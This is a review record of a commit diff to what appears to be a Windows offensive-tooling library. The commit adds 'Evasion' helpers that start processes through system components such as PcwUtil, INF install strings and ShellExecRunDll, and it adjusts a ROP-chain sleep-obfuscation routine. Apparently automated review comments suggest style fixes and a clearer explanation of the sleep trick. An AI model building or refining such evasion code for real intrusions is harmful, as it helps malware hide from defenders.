|
||||
HANDLE Process = GetCurrentProcessNoForward();
|
||||
HANDLE Token = INVALID_HANDLE_VALUE;
|
||||
TOKEN_PRIVILEGES Privileges = { 0 };
|
||||
DWORD TokenLength = 0;
|
||||
|
|
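Review bot: `HANDLE Token = INVALID_HANDLE_VALUE;` initialises the token to -1, the same bit pattern as the current-process pseudo-handle assigned to Process on the line above; OpenProcessToken reports failure through its return value and may leave the out-handle untouched, so a cleanup written as `if (Token) CloseHandle(Token);` would close -1, while `if (Token != INVALID_HANDLE_VALUE)` works but differs from the rest of the commit. Initialise with `HANDLE Token = NULL;` and test for NULL at cleanup, the convention GetCurrentUserSid and IsProcessRunningAsAdmin in this commit follow. The function body continues outside the hunk, so the actual cleanup check is not visible.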
|
@ -97,7 +97,7 @@ BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In
|
|||
// WaitForSingleObject
|
||||
RopWaitForSingleObject.Rsp -= 8;
|
||||
RopWaitForSingleObject.Rip = (DWORD64)WaitForSingleObject;
|
||||
RopWaitForSingleObject.Rcx = (DWORD64)InlineGetCurrentProcess;
|
||||
RopWaitForSingleObject.Rcx = (DWORD64)GetCurrentProcessNoForward();
|
||||
RopWaitForSingleObject.Rdx = dwSleepTimeInMilliseconds;
|
||||
|
||||
// SystemFunction032
|
||||
|
|
|
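Review bot: `RopWaitForSingleObject.Rcx = (DWORD64)GetCurrentProcessNoForward();` loads the current-process pseudo-handle as the first argument of the WaitForSingleObject frame with the sleep time in Rdx — the wait returns only on timeout because a running process's own handle is not signaled, which is the whole trick — yet the comment above is just `// WaitForSingleObject`. Expand it to `// WaitForSingleObject(hCurrentProcess, dwSleepTimeInMilliseconds): the pseudo-handle never signals, so this is a timed sleep inside the ROP chain`. The Rcx/Rdx/Rsp layout assumes the x64 calling convention, which is worth naming there as well. The function begins and ends outside the hunk.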
@ -152,11 +152,17 @@
|
|||
<ClCompile Include="CreateMd5HashFromFilePath.cpp" />
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp" />
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessWithCfGuard.cpp" />
|
||||
|
@ -173,6 +179,8 @@
|
|||
<ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
|
||||
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
|
||||
<ClCompile Include="GetCurrentProcessNoForward.cpp" />
|
||||
<ClCompile Include="GetCurrentThreadNoForward.cpp" />
|
||||
<ClCompile Include="GetPeSectionSizeInBytes.cpp" />
|
||||
<ClCompile Include="IsPeSection.cpp" />
|
||||
<ClCompile Include="LzMaximumCompressBuffer.cpp" />
|
||||
|
|
|
@ -771,6 +771,30 @@
|
|||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentProcessNoForward.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentThreadNoForward.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -47,9 +47,6 @@
|
|||
|
||||
#define Get16Bits(d) ((((UINT32)(((CONST UINT8*)(d))[1])) << 8) +(UINT32)(((CONST UINT8*)(d))[0]))
|
||||
|
||||
#define InlineGetCurrentThread ((HANDLE)(LONG_PTR)-2)
|
||||
#define InlineGetCurrentProcess (HANDLE)((HANDLE)-1)
|
||||
|
||||
/*******************************************
|
||||
RAD HARDWARE BREAKPOINT HOOKING ENGINE DATA
|
||||
*******************************************/
|
||||
|
@ -221,6 +218,8 @@ DWORD GetPeSectionSizeInBytesW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName);
|
|||
DWORD GetPeSectionSizeInBytesA(_In_ LPCSTR Path, _In_ LPCSTR SectionName);
|
||||
BOOL ReadDataFromPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _Inout_ PBYTE ReadData, _Inout_opt_ PDWORD DataReadInBytes);
|
||||
BOOL ReadDataFromPeSectionA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _Inout_ PBYTE ReadData, _Inout_opt_ PDWORD DataReadInBytes);
|
||||
HANDLE GetCurrentProcessNoForward(VOID);
|
||||
HANDLE GetCurrentThreadNoForward(VOID);
|
||||
|
||||
|
||||
|
||||
|
@ -364,6 +363,18 @@ BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWS
|
|||
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromPcwUtilW(LPCWSTR PathToBinary);
|
||||
BOOL CreateProcessFromPcwUtilA(LPCSTR PathToBinary);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection); // <--- not implemented
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection); // <--- not implemented
|
||||
BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile);
|
||||
|
||||
|
||||
|
||||
|
|
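Review bot: The new CreateProcessFrom* prototypes carry no SAL annotations, while the neighbouring declarations in this header (ReadDataFromPeSectionW, GetPeSectionSizeInBytesW) annotate every parameter with `_In_`; annotate the new ones the same way, e.g. `BOOL CreateProcessFromIeFrameOpenUrlW(_In_ LPCWSTR PathToUrlFile);`. The `// <--- not implemented` remark on the NoCab3 pair is the only record that those functions are stubs, and a caller who reads the README table will not see it; either keep the stubs out of the public header until they are implemented or state the behaviour in the comment (`// stub: always returns FALSE`). The new GetCurrentProcessNoForward/GetCurrentThreadNoForward declarations replace the removed Inline* macros and would benefit from a one-line comment saying they return pseudo-handles that must not be closed.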